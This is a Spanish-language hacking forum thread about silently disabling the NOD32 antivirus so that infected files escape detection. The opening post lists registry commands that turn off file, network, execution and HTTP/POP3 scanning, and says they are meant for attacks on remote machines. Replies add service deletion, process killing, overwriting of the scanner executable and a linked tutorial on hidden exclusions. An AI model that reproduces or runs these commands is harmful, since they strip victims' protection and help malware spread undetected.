Desactivando el Anti-Virus NOD32!!!!!! [Versión: 2.7.x // 3.x]

[Lukhardy]

by lukhardy

Detecté este bug...(la pucha, se me ha caido la imagen de este AV  )

El NOD32 es un muy buen antivirus, y es uno de los más usados por los usuarios de internet... y en este foro he visto que muchos tienen problemas con este AV por que sus archivos infectados son detectados por éste...

Estuve viendo los cambios que realiza el AV NOD32 al activar y desactivar distintas opciones. Supuse que "alguna cosa" tendría que cambiar mientras hacía esto, y me llamó la atención lo fácil que es vulnerar este AV simplemente manipulando el registro. Y les digo que es posible hacer estas acciones desde archivos bat . Ahora solo les voy a mostrar como hacerl tales acciones, tanto para el MONITOR DE SISTEMA DE ARCHIVOS [AMON] y PROTECCION PARA EL TRAFICO DE INTERNET [IMON].

Disculpen la improlijidad


OPCIONES DE NOD32 - registro

MONITOR DEL SISTEMA DE ARCHIVOS - AMON
//////////////////////////////////////

-------------------

UBICACION
/////////////

Desactivar NOD32 para deteccion de archivos ubicados en PC

Código:

reg add hklm\software\eset\nod\currentversion\modules\amon\settings\config000\settings /v media_local /t reg_dword /d 0x00000000 /y

Activar NOD32 para deteccion de archivos ubicados en PC

Código:

reg add hklm\software\eset\nod\currentversion\modules\amon\settings\config000\settings /v media_local /t reg_dword /d 0x00000001 /y

Desactivar NOD32 para deteccion de archivos en la red

Código:

reg add hklm\software\eset\nod\currentversion\modules\amon\settings\config000\settings /v media_network /t reg_dword /d 0x00000000 /y

Activar NOD32 para deteccion de archivos en la red

Código:

reg add hklm\software\eset\nod\currentversion\modules\amon\settings\config000\settings /v media_network /t reg_dword /d 0x00000001 /y

Desactivar NOD32 para deteccion de archivos en Disquetes

Código:

reg add hklm\software\eset\nod\currentversion\modules\amon\settings\config000\settings /v media_floppies /t reg_dword /d 0x00000000 /y

Activar NOD32 para deteccion de archivos en Disquetes

Código:

reg add hklm\software\eset\nod\currentversion\modules\amon\settings\config000\settings /v media_floppies /t reg_dword /d 0x00000001 /y

------------------

ARCHIVOS
/////////////////

Desactivar NOD32 para deteccion de archivos al acceder

Código:

reg add hklm\software\eset\nod\currentversion\modules\amon\settings\config000\settings /v check_on_open /t reg_dword /d 0x00000000 /y

Activar NOD32 para deteccion de archivos al acceder

Código:

reg add hklm\software\eset\nod\currentversion\modules\amon\settings\config000\settings /v check_on_open /t reg_dword /d 0x00000001 /y

Desactivar NOD32 para deteccion de archivos al ejecutar

Código:

reg add hklm\software\eset\nod\currentversion\modules\amon\settings\config000\settings /v check_on_execute /t reg_dword /d 0x00000000 /y

Activar NOD32 para deteccion de archivos al ejecutar

Código:

reg add hklm\software\eset\nod\currentversion\modules\amon\settings\config000\settings /v check_on_execute /t reg_dword /d 0x00000001 /y

Desactivar NOD32 para deteccion de archivos al crear

Código:

reg add hklm\software\eset\nod\currentversion\modules\amon\settings\config000\settings /v check_on_create /t reg_dword /d 0x00000000 /y

Activar NOD32 para deteccion de archivos al crear

Código:

reg add hklm\software\eset\nod\currentversion\modules\amon\settings\config000\settings /v check_on_create /t reg_dword /d 0x00000001 /y

PROTECCION DE TRÁFICO DE INTERNET - IMON
//////////////////////////////////////


Activar NOD32 para análisis HTTP

Código:

reg add hklm\software\eset\nod\currentversion\modules\imon\settings\config000\settings /v http_enable /t reg_dword /d 0x00000001 /y

Desactivar NOD32 para análisis HTTP

Código:

reg add hklm\software\eset\nod\currentversion\modules\imon\settings\config000\settings /v http_enable /t reg_dword /d 0x00000000 /y

Activar NOD32 para análisis de correo POP3

Código:

reg add hklm\software\eset\nod\currentversion\modules\imon\settings\config000\settings /v pop3_enable /t reg_dword /d 0x00000001 /y

Desactivar NOD32 para análisis de correo POP3

Código:

reg add hklm\software\eset\nod\currentversion\modules\imon\settings\config000\settings /v pop3_enable /t reg_dword /d 0x00000000 /y

Y todavía hay más... Pero lo voy a ir incluyendo de a poco.

Y pondré también una demostración de cómo ejecutar estos códigos en un equipo remoto a la hora de realizar un ataque.

Esto es solo un aporte de mi parte. No he encontrado otro tutorial (por llamarlo así) que explique lo que expuse, ni en el foro ni en internet.


Espero que sirva. Seguro que sí .
Chau

[jackl007 ツ]

no pense que el nod los tendria asi de faciles ...
seria bueno crear un executable en VB que tenga botones con estas opciones y permita crear otro exe que dadas las funciones ejecute las ordenes ...

[eloko]

probe con cada entrada del registro pero sin el argumento /y porque no lo reconoce y el antivirus igual sigue activado y analizando archivos

[b_side]

¿sabes como añadir un archivo a la lista de exclusiones usando este metodo?

[softdates]

buenas lukhardy

solicito tu permiso para publicar lo expuesto por ti aqui lo añadire a lo que corresponde a la recopilacion de netcat

[xv3n0mx - VenoM]

a que version de NOD32 te refieres? la 3.0?

[Lukhardy]

Esto funciona con la version 2.7 y anteriores. No sé si con la 3.0... pero ya voy a ver las diferencias que ocurre con esta última.

-----------------------
Aclaro que los códigos batch son de limitado alcance, es decir, puede que necesitemos permisos de administrador para poder ejecutar estos códigos. Una solución para esto sería crear un programa que cumpla lo requerido. (Modificar el registro).
----------------------

Saludos xv3n0mx - VenoM

[b_side]

Basandome en la idea de este post he creado un tutorial explicando como añadir excepciones silenciosamente y a traves del registro

http://www.indetectablex.freeweb7.com/index.php?dir=Herramientas%20y%20Utilidades/&file=%5BTutorial%5DComo%20a%C3%B1adir%20exclusiones%20a%20NOD32%20silenciosamente.rar

pass: indetectablex.com

[eloko]

otra forma mas facil seria

"reg delete hklm\software\eset\nod\currentversion\modules /f"

y despues si reinicia el pc no le iniciara ningun modulo de escaneo en tiempo real y si no quieres esperar al reinicio

Código:

"taskkill /f /IM nod32krn.exe"

Salu2

[bigsnake]

ademas has de saber que asta k el pc no se reinicie los kambios k agas no tendran efecto...
es decir, si lo configuras para que no analice "x cosa"(yo preferi añadir la extension que sea y asociarla a exefile con assoc...) no tendra efecto asta el siguiente reinicio....

una solucion efectiva seria:

sc delete nod32krn
taskkill /f /im nod32krn.exe
sc delete amon
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Eset\Nod\CurrentVersion\Modules /f
tskill /id:0 nod32kui
echo exit>"%programfiles%\eset\nod32.exe"

anula el servicio, cierra los procesos, elimina el registro(solo parte) e inutiliza el archivo ejecutable de analisis asistido.....

bye

[b_side]

ademas has de saber que asta k el pc no se reinicie los kambios k agas no tendran efecto...
es decir, si lo configuras para que no analice "x cosa"(yo preferi añadir la extension que sea y asociarla a exefile con assoc...) no tendra efecto asta el siguiente reinicio....

A mi si me funciona las excepciones al momento, sin reiniciar

Esto no lo entiendi:

(yo preferi añadir la extension que sea y asociarla a exefile con assoc...)

[eloko]

ademas has de saber que asta k el pc no se reinicie los kambios k agas no tendran efecto...
es decir, si lo configuras para que no analice "x cosa"(yo preferi añadir la extension que sea y asociarla a exefile con assoc...) no tendra efecto asta el siguiente reinicio....

una solucion efectiva seria:

sc delete nod32krn
taskkill /f /im nod32krn.exe
sc delete amon
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Eset\Nod\CurrentVersion\Modules /f
tskill /id:0 nod32kui
echo exit>"%programfiles%\eset\nod32.exe"

anula el servicio, cierra los procesos, elimina el registro(solo parte) e inutiliza el archivo ejecutable de analisis asistido.....

bye

pero al desactivar   nod32kui levantaría muchas sospechas ya que no estaría el trayicon .


y al hacer un

"taskkill /f /IM nod32krn.exe"

no es necesario un reinicio porque al cerrar ese proceso (que pertenece al Servicio del nod32) se vuelve a iniciar y es como si se hubiese reiniciado Windows


Salu2

[Lukhardy]

b_side: "Basandome en la idea de este post he creado un tutorial explicando como añadir excepciones silenciosamente y a traves del registro"

Merezco algun crédito en tu tutorial ya que te basaste en la idea de este post, no?  JAJAJAJA. Solo que le pusiste gráficos al tuyo pero en escensia es lo mismo.


Los cambios que se hacen en el registro funcionan sin tener la necesidad de reiniciar la Pc. Es automático el cambio. Pero en caso de que no les funcione y evitar reiniciar la pc, solo deberán terminar el proceso explorer.exe y luego volver a ejecutarlo, y listo. El cambio se habrá hecho.

Desde la consola de comandos sería:
Terminar proceso:

Código:

taskkill /f /im explorer.exe

Ejecutar nuevamente:

Código:

start explorer.exe

Fácil, no?... Bueno, sigan poniendo sus dudas o criticas o lo que quieran con respecto al post.

____________
Che, si van a copiar o llevarse de este pequeño post para hacer sus tutoriales o cosas por el estilo hagan el favor de poner el nombre del autor.
 Gracias

[b_side]

b_side: "Basandome en la idea de este post he creado un tutorial explicando como añadir excepciones silenciosamente y a traves del registro"

Merezco algun crédito en tu tutorial ya que te basaste en la idea de este post, no?  JAJAJAJA. Solo que le pusiste gráficos al tuyo pero en escensia es lo mismo.

Hombre, la idea se me ocurrio investigando por mi cuenta a partir de tu idea de modificar cosas del nod en el registro, pero el proceso es distinto de hacer un simple "reg ad", necesitamos tener nosotros instalado el nod, configurarlo, guardar en un .reg la config, etc...

Pero si te fijas al final puse tu info como info extra y si te cite a ti y a este foro

[Lukhardy]

Hombre, la idea se me ocurrio investigando por mi cuenta a partir de tu idea de modificar cosas del nod en el registro, pero el proceso es distinto de hacer un simple "reg ad", necesitamos tener nosotros instalado el nod, configurarlo, guardar en un .reg la config, etc

Che loco, no es que haya hecho alarde de esto, al fin y al cabo la información es para todos (Yo de onda lo puse ta? ). Modificar el registro de una forma u otra sea el metodo que sea, al fin y al cabo se terminará en lo mismo...    modificar · el · registro...

No desmerezco tu metodo, absolutamente lo contrario, es interesante y es una forma mas clara de ver lo que se hace para gente que se inicie en el tema y que tenga miedo - por decirlo así - de tocar el registro. Digo yo...

Yo puse cómo deshabilitar el NOD32 sin levantar sospechas, b_side puso algo mejor, sin deshabilitar NOD32 poder usar un archivo infectado en un sector de la pc en el que este AV no realice un escaneo, por lo tanto se podrá ejecutar o manipular a gusto lo que ahí exista, siempre.  ¡¡¡ QUE BUENO!!! 

Excelente aporte b_side, seguí así.

Aportes de este tipo viene al pelo. Sigan optimizandolo